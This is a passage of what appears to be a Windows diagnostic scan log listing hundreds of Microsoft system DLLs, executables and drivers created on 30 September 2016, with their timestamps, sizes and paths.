2016-09-30 06:31 - 2016-09-15 19:25 - 02681200 _____ C:\WINDOWS\system32\CoreUIComponents.dll
2016-09-30 06:31 - 2016-09-15 19:25 - 00340320 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\msv1_0.dll
2016-09-30 06:31 - 2016-09-15 19:25 - 00262960 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.Storage.ApplicationData.dll
2016-09-30 06:31 - 2016-09-15 19:24 - 00764936 _____ (Microsoft Corporation) C:\WINDOWS\system32\CoreMessaging.dll
2016-09-30 06:31 - 2016-09-15 19:23 - 01503032 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\WindowsCodecs.dll
2016-09-30 06:31 - 2016-09-15 19:23 - 00170960 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\gdi32.dll
2016-09-30 06:31 - 2016-09-15 19:22 - 05722320 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\windows.storage.dll
2016-09-30 06:31 - 2016-09-15 19:22 - 02256080 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\iertutil.dll
2016-09-30 06:31 - 2016-09-15 19:22 - 00975744 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\twinapi.appcore.dll
2016-09-30 06:31 - 2016-09-15 19:21 - 01218912 _____ (Microsoft Corporation) C:\WINDOWS\system32\aeinv.dll
2016-09-30 06:31 - 2016-09-15 19:20 - 00846560 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\WinTypes.dll
2016-09-30 06:31 - 2016-09-15 19:19 - 00361104 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\tsmf.dll
2016-09-30 06:31 - 2016-09-15 19:18 - 03893376 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mfcore.dll
2016-09-30 06:31 - 2016-09-15 19:18 - 01201872 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mfmpeg2srcsnk.dll
2016-09-30 06:31 - 2016-09-15 19:18 - 01123368 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mfplat.dll
2016-09-30 06:31 - 2016-09-15 19:18 - 00980832 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mfnetcore.dll
2016-09-30 06:31 - 2016-09-15 19:18 - 00955528 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mfsvr.dll
2016-09-30 06:31 - 2016-09-15 19:18 - 00856872 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mfreadwrite.dll
2016-09-30 06:31 - 2016-09-15 19:18 - 00404832 _____ (Microsoft Corporation) C:\WINDOWS\system32\msv1_0.dll
2016-09-30 06:31 - 2016-09-15 19:18 - 00328008 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Storage.ApplicationData.dll
2016-09-30 06:31 - 2016-09-15 19:17 - 20965248 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\shell32.dll
2016-09-30 06:31 - 2016-09-15 19:17 - 04311736 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\explorer.exe
2016-09-30 06:31 - 2016-09-15 19:17 - 00360040 _____ (Microsoft Corporation) C:\WINDOWS\system32\SystemSettingsAdminFlows.exe
2016-09-30 06:31 - 2016-09-15 19:16 - 07219672 _____ (Microsoft Corporation) C:\WINDOWS\system32\windows.storage.dll
2016-09-30 06:31 - 2016-09-15 19:16 - 02750384 _____ (Microsoft Corporation) C:\WINDOWS\system32\iertutil.dll
2016-09-30 06:31 - 2016-09-15 19:16 - 02190176 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\dxgkrnl.sys
2016-09-30 06:31 - 2016-09-15 19:16 - 01859264 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.ApplicationModel.Store.dll
2016-09-30 06:31 - 2016-09-15 19:16 - 01738040 _____ (Microsoft Corporation) C:\WINDOWS\system32\WindowsCodecs.dll
2016-09-30 06:31 - 2016-09-15 19:16 - 01292640 _____ (Microsoft Corporation) C:\WINDOWS\system32\LicenseManager.dll
2016-09-30 06:31 - 2016-09-15 19:16 - 01157000 _____ (Microsoft Corporation) C:\WINDOWS\system32\twinapi.appcore.dll
2016-09-30 06:31 - 2016-09-15 19:16 - 00657760 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\dxgmms2.sys
2016-09-30 06:31 - 2016-09-15 19:16 - 00527808 _____ (Microsoft Corporation) C:\WINDOWS\system32\WWanAPI.dll
2016-09-30 06:31 - 2016-09-15 19:16 - 00401760 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\dxgmms1.sys
2016-09-30 06:31 - 2016-09-15 19:16 - 00206096 _____ (Microsoft Corporation) C:\WINDOWS\system32\gdi32.dll
2016-09-30 06:31 - 2016-09-15 19:16 - 00146784 _____ (Microsoft Corporation) C:\WINDOWS\system32\CloudExperienceHostCommon.dll
2016-09-30 06:31 - 2016-09-15 19:15 - 02446704 _____ (Microsoft Corporation) C:\WINDOWS\system32\msxml6.dll
2016-09-30 06:31 - 2016-09-15 19:15 - 00649568 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\fvevol.sys
2016-09-30 06:31 - 2016-09-15 19:15 - 00341936 _____ (Microsoft Corporation) C:\WINDOWS\system32\wintrust.dll
2016-09-30 06:31 - 2016-09-15 19:15 - 00223584 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\mrxsmb20.sys
2016-09-30 06:31 - 2016-09-15 19:15 - 00130912 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\storahci.sys
2016-09-30 06:31 - 2016-09-15 19:14 - 01100128 _____ (Microsoft Corporation) C:\WINDOWS\system32\hvix64.exe
2016-09-30 06:31 - 2016-09-15 19:14 - 00988512 _____ (Microsoft Corporation) C:\WINDOWS\system32\hvax64.exe
2016-09-30 06:31 - 2016-09-15 19:14 - 00947552 _____ (Microsoft Corporation) C:\WINDOWS\system32\hvloader.efi
2016-09-30 06:31 - 2016-09-15 19:14 - 00811872 _____ (Microsoft Corporation) C:\WINDOWS\system32\hvloader.exe
2016-09-30 06:31 - 2016-09-15 19:13 - 01264912 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\msctf.dll
2016-09-30 06:31 - 2016-09-15 19:12 - 08158672 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Media.Protection.PlayReady.dll
2016-09-30 06:31 - 2016-09-15 19:11 - 04673296 _____ (Microsoft Corporation) C:\WINDOWS\explorer.exe
2016-09-30 06:31 - 2016-09-15 19:11 - 00773168 _____ (Microsoft Corporation) C:\WINDOWS\system32\sppwinob.dll
2016-09-30 06:31 - 2016-09-15 19:10 - 01600632 _____ (Microsoft Corporation) C:\WINDOWS\system32\sppobjs.dll
2016-09-30 06:31 - 2016-09-15 19:10 - 00918848 _____ (Microsoft Corporation) C:\WINDOWS\system32\EditionUpgradeManagerObj.dll
2016-09-30 06:31 - 2016-09-15 19:06 - 01469120 _____ (Microsoft Corporation) C:\WINDOWS\system32\appraiser.dll
2016-09-30 06:31 - 2016-09-15 19:06 - 01046880 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\http.sys
2016-09-30 06:31 - 2016-09-15 19:06 - 00587968 _____ (Microsoft Corporation) C:\WINDOWS\system32\generaltel.dll
2016-09-30 06:31 - 2016-09-15 19:06 - 00050880 _____ (Microsoft Corporation) C:\WINDOWS\system32\CompatTelRunner.exe
2016-09-30 06:31 - 2016-09-15 19:03 - 00094720 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\UserDataTimeUtil.dll
2016-09-30 06:31 - 2016-09-15 19:03 - 00026112 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\odbcconf.dll
2016-09-30 06:31 - 2016-09-15 19:01 - 00055296 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\findnetprinters.dll
2016-09-30 06:31 - 2016-09-15 19:00 - 00554496 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\tdh.dll
2016-09-30 06:31 - 2016-09-15 19:00 - 00518656 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\ngccredprov.dll
2016-09-30 06:31 - 2016-09-15 19:00 - 00177664 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.Web.Diagnostics.dll
2016-09-30 06:31 - 2016-09-15 19:00 - 00156672 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\UserDeviceRegistration.dll
2016-09-30 06:31 - 2016-09-15 19:00 - 00156672 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\BcastDVRHelper.dll
2016-09-30 06:31 - 2016-09-15 19:00 - 00138240 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\DisplayManager.dll
2016-09-30 06:31 - 2016-09-15 18:59 - 00143872 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\credprovslegacy.dll
2016-09-30 06:31 - 2016-09-15 18:58 - 00491008 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\bcastdvr.exe
2016-09-30 06:31 - 2016-09-15 18:58 - 00248832 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\wlancfg.dll
2016-09-30 06:31 - 2016-09-15 18:58 - 00092672 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.ApplicationModel.Background.SystemEventsBroker.dll
2016-09-30 06:31 - 2016-09-15 18:58 - 00088576 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\UserDeviceRegistration.Ngc.dll
2016-09-30 06:31 - 2016-09-15 18:58 - 00059904 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.System.UserDeviceAssociation.dll
2016-09-30 06:31 - 2016-09-15 18:57 - 00404992 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\dsreg.dll
2016-09-30 06:31 - 2016-09-15 18:57 - 00374784 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.Devices.LowLevel.dll
2016-09-30 06:31 - 2016-09-15 18:57 - 00299520 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\UserDataAccountApis.dll
2016-09-30 06:31 - 2016-09-15 18:57 - 00237056 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\SyncSettings.dll
2016-09-30 06:31 - 2016-09-15 18:57 - 00231936 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.ApplicationModel.LockScreen.dll
2016-09-30 06:31 - 2016-09-15 18:57 - 00179712 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\InstallAgent.exe
2016-09-30 06:31 - 2016-09-15 18:56 - 01300480 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\MSVPXENC.dll
2016-09-30 06:31 - 2016-09-15 18:56 - 00822784 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Chakradiag.dll
2016-09-30 06:31 - 2016-09-15 18:56 - 00670208 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.Devices.PointOfService.dll
2016-09-30 06:31 - 2016-09-15 18:56 - 00554496 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\StoreAgent.dll
2016-09-30 06:31 - 2016-09-15 18:56 - 00413184 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\SndVolSSO.dll
2016-09-30 06:31 - 2016-09-15 18:56 - 00265728 _____ C:\WINDOWS\SysWOW64\Windows.Perception.Stub.dll
2016-09-30 06:31 - 2016-09-15 18:56 - 00262656 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\pdh.dll
2016-09-30 06:31 - 2016-09-15 18:56 - 00257536 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\DataExchange.dll
2016-09-30 06:31 - 2016-09-15 18:56 - 00117760 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\AuthBroker.dll
2016-09-30 06:31 - 2016-09-15 18:55 - 01243136 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.Media.FaceAnalysis.dll
2016-09-30 06:31 - 2016-09-15 18:55 - 00575488 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\nshwfp.dll
2016-09-30 06:31 - 2016-09-15 18:55 - 00562176 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.Devices.SmartCards.dll
2016-09-30 06:31 - 2016-09-15 18:55 - 00455168 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\NetworkCollectionAgent.dll
2016-09-30 06:31 - 2016-09-15 18:55 - 00426496 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.ApplicationModel.Wallet.dll
2016-09-30 06:31 - 2016-09-15 18:55 - 00332288 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.Internal.Bluetooth.dll
2016-09-30 06:31 - 2016-09-15 18:55 - 00306176 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\ieproxy.dll
2016-09-30 06:31 - 2016-09-15 18:55 - 00222720 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\InstallAgentUserBroker.exe
2016-09-30 06:31 - 2016-09-15 18:55 - 00202752 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.Devices.HumanInterfaceDevice.dll
2016-09-30 06:31 - 2016-09-15 18:55 - 00175616 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.Devices.Scanners.dll
2016-09-30 06:31 - 2016-09-15 18:55 - 00152064 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\biwinrt.dll
2016-09-30 06:31 - 2016-09-15 18:54 - 00747520 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.Media.Ocr.dll
2016-09-30 06:31 - 2016-09-15 18:54 - 00498688 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mbsmsapi.dll
2016-09-30 06:31 - 2016-09-15 18:54 - 00461312 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\webio.dll
2016-09-30 06:31 - 2016-09-15 18:54 - 00431104 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mprdim.dll
2016-09-30 06:31 - 2016-09-15 18:53 - 00466432 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\sppcext.dll
2016-09-30 06:31 - 2016-09-15 18:53 - 00314368 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.Devices.Usb.dll
2016-09-30 06:31 - 2016-09-15 18:53 - 00284672 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.ApplicationModel.dll
2016-09-30 06:31 - 2016-09-15 18:52 - 01358336 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\UIAutomationCore.dll
2016-09-30 06:31 - 2016-09-15 18:52 - 00816640 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\NaturalLanguage6.dll
2016-09-30 06:31 - 2016-09-15 18:52 - 00661504 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\WpcWebFilter.dll
2016-09-30 06:31 - 2016-09-15 18:52 - 00525824 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\PrintDialogs.dll
2016-09-30 06:31 - 2016-09-15 18:52 - 00285696 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\cryptngc.dll
2016-09-30 06:31 - 2016-09-15 18:52 - 00238080 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\AboveLockAppHost.dll
2016-09-30 06:31 - 2016-09-15 18:51 - 02333184 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\WsmSvc.dll
2016-09-30 06:31 - 2016-09-15 18:51 - 00288256 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\CryptoWinRT.dll
2016-09-30 06:31 - 2016-09-15 18:50 - 07625728 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\twinui.dll
2016-09-30 06:31 - 2016-09-15 18:50 - 07219200 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Data.Pdf.dll
2016-09-30 06:31 - 2016-09-15 18:50 - 01534464 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.Graphics.Printing.3D.dll
2016-09-30 06:31 - 2016-09-15 18:49 - 19416576 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mshtml.dll
2016-09-30 06:31 - 2016-09-15 18:49 - 04612608 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.Media.dll
2016-09-30 06:31 - 2016-09-15 18:49 - 00901120 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.Devices.Bluetooth.dll
2016-09-30 06:31 - 2016-09-15 18:49 - 00710144 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\AppointmentApis.dll
2016-09-30 06:31 - 2016-09-15 18:49 - 00653312 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.AccountsControl.dll
2016-09-30 06:31 - 2016-09-15 18:48 - 01321472 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\wsp_fs.dll
2016-09-30 06:31 - 2016-09-15 18:48 - 01112576 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\wsp_health.dll
2016-09-30 06:31 - 2016-09-15 18:47 - 19416576 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\edgehtml.dll
2016-09-30 06:31 - 2016-09-15 18:47 - 01077760 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.Media.Editing.dll
2016-09-30 06:31 - 2016-09-15 18:47 - 00366080 _____ (Microsoft Corporation) C:\WINDOWS\system32\RDXTaskFactory.dll
2016-09-30 06:31 - 2016-09-15 18:47 - 00355328 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\RTMediaFrame.dll
2016-09-30 06:31 - 2016-09-15 18:47 - 00134656 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.Energy.dll
2016-09-30 06:31 - 2016-09-15 18:46 - 22566912 _____ (Microsoft Corporation) C:\WINDOWS\system32\edgehtml.dll
2016-09-30 06:31 - 2016-09-15 18:46 - 03305984 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\MFMediaEngine.dll
2016-09-30 06:31 - 2016-09-15 18:46 - 00713216 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\wpnapps.dll
2016-09-30 06:31 - 2016-09-15 18:46 - 00558080 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\clusapi.dll
2016-09-30 06:31 - 2016-09-15 18:46 - 00049664 _____ (Microsoft Corporation) C:\WINDOWS\system32\ffbroker.dll
2016-09-30 06:31 - 2016-09-15 18:45 - 12174848 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\ieframe.dll
2016-09-30 06:31 - 2016-09-15 18:45 - 02642944 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\tquery.dll
2016-09-30 06:31 - 2016-09-15 18:45 - 00248832 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\dlnashext.dll
2016-09-30 06:31 - 2016-09-15 18:44 - 01255936 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\AzureSettingSyncProvider.dll
2016-09-30 06:31 - 2016-09-15 18:44 - 00209920 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\MSAC3ENC.DLL
2016-09-30 06:31 - 2016-09-15 18:43 - 00433664 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\imapi2.dll
2016-09-30 06:31 - 2016-09-15 18:43 - 00271872 _____ (Microsoft Corporation) C:\WINDOWS\system32\mfksproxy.dll
2016-09-30 06:31 - 2016-09-15 18:43 - 00210432 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\offlinesam.dll
2016-09-30 06:31 - 2016-09-15 18:43 - 00130560 _____ (Microsoft Corporation) C:\WINDOWS\splwow64.exe
2016-09-30 06:31 - 2016-09-15 18:43 - 00039424 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\kbdhid.sys
2016-09-30 06:31 - 2016-09-15 18:43 - 00036864 _____ (Microsoft Corporation) C:\WINDOWS\system32\cmintegrator.dll
2016-09-30 06:31 - 2016-09-15 18:42 - 01220608 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.Media.Audio.dll
2016-09-30 06:31 - 2016-09-15 18:42 - 00719872 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\wsp_sr.dll
2016-09-30 06:31 - 2016-09-15 18:42 - 00492544 _____ (Microsoft Corporation) C:\WINDOWS\system32\nltest.exe
2016-09-30 06:31 - 2016-09-15 18:42 - 00237568 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Web.Diagnostics.dll
2016-09-30 06:31 - 2016-09-15 18:42 - 00123904 _____ (Microsoft Corporation) C:\WINDOWS\system32\mssprxy.dll
2016-09-30 06:31 - 2016-09-15 18:42 - 00051712 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\winhvr.sys
2016-09-30 06:31 - 2016-09-15 18:41 - 06043136 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Chakra.dll
2016-09-30 06:31 - 2016-09-15 18:41 - 03733504 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\D3DCompiler_47.dll
2016-09-30 06:31 - 2016-09-15 18:41 - 00259072 _____ (Microsoft Corporation) C:\WINDOWS\system32\Family.SyncEngine.dll
2016-09-30 06:31 - 2016-09-15 18:41 - 00185344 _____ (Microsoft Corporation) C:\WINDOWS\system32\DisplayManager.dll
2016-09-30 06:31 - 2016-09-15 18:41 - 00156160 _____ (Microsoft Corporation) C:\WINDOWS\system32\Family.Client.dll
2016-09-30 06:31 - 2016-09-15 18:41 - 00108032 _____ (Microsoft Corporation) C:\WINDOWS\system32\Family.Authentication.dll
2016-09-30 06:31 - 2016-09-15 18:41 - 00090624 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Devices.Printers.dll
2016-09-30 06:31 - 2016-09-15 18:41 - 00073216 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.StateRepositoryBroker.dll
2016-09-30 06:31 - 2016-09-15 18:41 - 00051200 _____ (Microsoft Corporation) C:\WINDOWS\system32\NfcRadioMedia.dll
2016-09-30 06:31 - 2016-09-15 18:40 - 02646016 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\CertEnroll.dll
2016-09-30 06:31 - 2016-09-15 18:40 - 01988096 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mssrch.dll
2016-09-30 06:31 - 2016-09-15 18:40 - 01170944 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.Media.Speech.dll
2016-09-30 06:31 - 2016-09-15 18:40 - 00348160 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.Devices.Midi.dll
2016-09-30 06:31 - 2016-09-15 18:40 - 00196096 _____ (Microsoft Corporation) C:\WINDOWS\system32\UserDeviceRegistration.dll
2016-09-30 06:31 - 2016-09-15 18:40 - 00194048 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Devices.WiFi.dll
2016-09-30 06:31 - 2016-09-15 18:40 - 00160768 _____ (Microsoft Corporation) C:\WINDOWS\system32\ACPBackgroundManagerPolicy.dll
2016-09-30 06:31 - 2016-09-15 18:40 - 00140800 _____ (Microsoft Corporation) C:\WINDOWS\system32\RMapi.dll
2016-09-30 06:31 - 2016-09-15 18:40 - 00122880 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.StateRepositoryClient.dll
2016-09-30 06:31 - 2016-09-15 18:40 - 00105984 _____ (Microsoft Corporation) C:\WINDOWS\system32\VPNv2CSP.dll
2016-09-30 06:31 - 2016-09-15 18:40 - 00101888 _____ (Microsoft Corporation) C:\WINDOWS\system32\UserDeviceRegistration.Ngc.dll
2016-09-30 06:31 - 2016-09-15 18:40 - 00092672 _____ (Microsoft Corporation) C:\WINDOWS\system32\BthRadioMedia.dll
2016-09-30 06:31 - 2016-09-15 18:40 - 00082432 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.System.UserDeviceAssociation.dll
2016-09-30 06:31 - 2016-09-15 18:39 - 02740224 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\msftedit.dll
2016-09-30 06:31 - 2016-09-15 18:39 - 02254848 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\wininet.dll
2016-09-30 06:31 - 2016-09-15 18:39 - 01880576 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.UI.Logon.dll
2016-09-30 06:31 - 2016-09-15 18:39 - 01595904 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\urlmon.dll
2016-09-30 06:31 - 2016-09-15 18:39 - 01013248 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.Web.Http.dll
2016-09-30 06:31 - 2016-09-15 18:39 - 01004544 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.UI.Input.Inking.dll
2016-09-30 06:31 - 2016-09-15 18:39 - 00827904 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\twinui.appcore.dll
2016-09-30 06:31 - 2016-09-15 18:39 - 00711168 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.UI.Search.dll
2016-09-30 06:31 - 2016-09-15 18:39 - 00589312 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.Devices.Sensors.dll
2016-09-30 06:31 - 2016-09-15 18:39 - 00547840 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Gaming.Input.dll
2016-09-30 06:31 - 2016-09-15 18:39 - 00418304 _____ C:\WINDOWS\system32\Windows.Perception.Stub.dll
2016-09-30 06:31 - 2016-09-15 18:39 - 00408576 _____ (Microsoft Corporation) C:\WINDOWS\system32\NgcCtnr.dll
2016-09-30 06:31 - 2016-09-15 18:39 - 00368640 _____ (Microsoft Corporation) C:\WINDOWS\system32\OneBackupHandler.dll
2016-09-30 06:31 - 2016-09-15 18:39 - 00322048 _____ (Microsoft Corporation) C:\WINDOWS\system32\PsmServiceExtHost.dll
2016-09-30 06:31 - 2016-09-15 18:39 - 00295936 _____ (Microsoft Corporation) C:\WINDOWS\system32\pdh.dll
2016-09-30 06:31 - 2016-09-15 18:39 - 00234496 _____ (Microsoft Corporation) C:\WINDOWS\system32\SettingsHandlers_Flights.dll
2016-09-30 06:31 - 2016-09-15 18:39 - 00186368 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Devices.Radios.dll
2016-09-30 06:31 - 2016-09-15 18:38 - 02999296 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\win32kfull.sys
2016-09-30 06:31 - 2016-09-15 18:38 - 02005504 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\DWrite.dll
2016-09-30 06:31 - 2016-09-15 18:38 - 01291264 _____ (Microsoft Corporation) C:\WINDOWS\system32\MSVPXENC.dll
2016-09-30 06:31 - 2016-09-15 18:38 - 00850944 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\ContactApis.dll
2016-09-30 06:31 - 2016-09-15 18:38 - 00773120 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\SearchIndexer.exe
2016-09-30 06:31 - 2016-09-15 18:38 - 00751104 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.Networking.BackgroundTransfer.dll
2016-09-30 06:31 - 2016-09-15 18:38 - 00691200 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\TokenBroker.dll
2016-09-30 06:31 - 2016-09-15 18:38 - 00671232 _____ (Microsoft Corporation) C:\WINDOWS\system32\NetworkCollectionAgent.dll
2016-09-30 06:31 - 2016-09-15 18:38 - 00654336 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\MbaeApiPublic.dll
2016-09-30 06:31 - 2016-09-15 18:38 - 00573952 _____ (Microsoft Corporation) C:\WINDOWS\system32\NgcCtnrGidsHandler.dll
2016-09-30 06:31 - 2016-09-15 18:38 - 00505856 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Devices.WiFiDirect.dll
2016-09-30 06:31 - 2016-09-15 18:38 - 00343552 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Devices.SmartCards.Phone.dll
2016-09-30 06:31 - 2016-09-15 18:38 - 00243712 _____ (Microsoft Corporation) C:\WINDOWS\system32\credprovhost.dll
2016-09-30 06:31 - 2016-09-15 18:38 - 00211456 _____ (Microsoft Corporation) C:\WINDOWS\system32\InstallAgent.exe
2016-09-30 06:31 - 2016-09-15 18:38 - 00208896 _____ (Microsoft Corporation) C:\WINDOWS\system32\provops.dll
2016-09-30 06:31 - 2016-09-15 18:38 - 00205824 _____ (Microsoft Corporation) C:\WINDOWS\system32\SearchFilterHost.exe
2016-09-30 06:31 - 2016-09-15 18:38 - 00171520 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Devices.SerialCommunication.dll
2016-09-30 06:31 - 2016-09-15 18:38 - 00132096 _____ (Microsoft Corporation) C:\WINDOWS\system32\PrintWSDAHost.dll
2016-09-30 06:31 - 2016-09-15 18:38 - 00125952 _____ (Microsoft Corporation) C:\WINDOWS\system32\appinfo.dll
2016-09-30 06:31 - 2016-09-15 18:37 - 00743424 _____ (Microsoft Corporation) C:\WINDOWS\system32\StoreAgent.dll
2016-09-30 06:31 - 2016-09-15 18:37 - 00690176 _____ (Microsoft Corporation) C:\WINDOWS\system32\ieproxy.dll
2016-09-30 06:31 - 2016-09-15 18:37 - 00680448 _____ (Microsoft Corporation) C:\WINDOWS\system32\tdh.dll
2016-09-30 06:31 - 2016-09-15 18:37 - 00568320 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Devices.LowLevel.dll
2016-09-30 06:31 - 2016-09-15 18:37 - 00321024 _____ (Microsoft Corporation) C:\WINDOWS\system32\NetworkUXBroker.dll
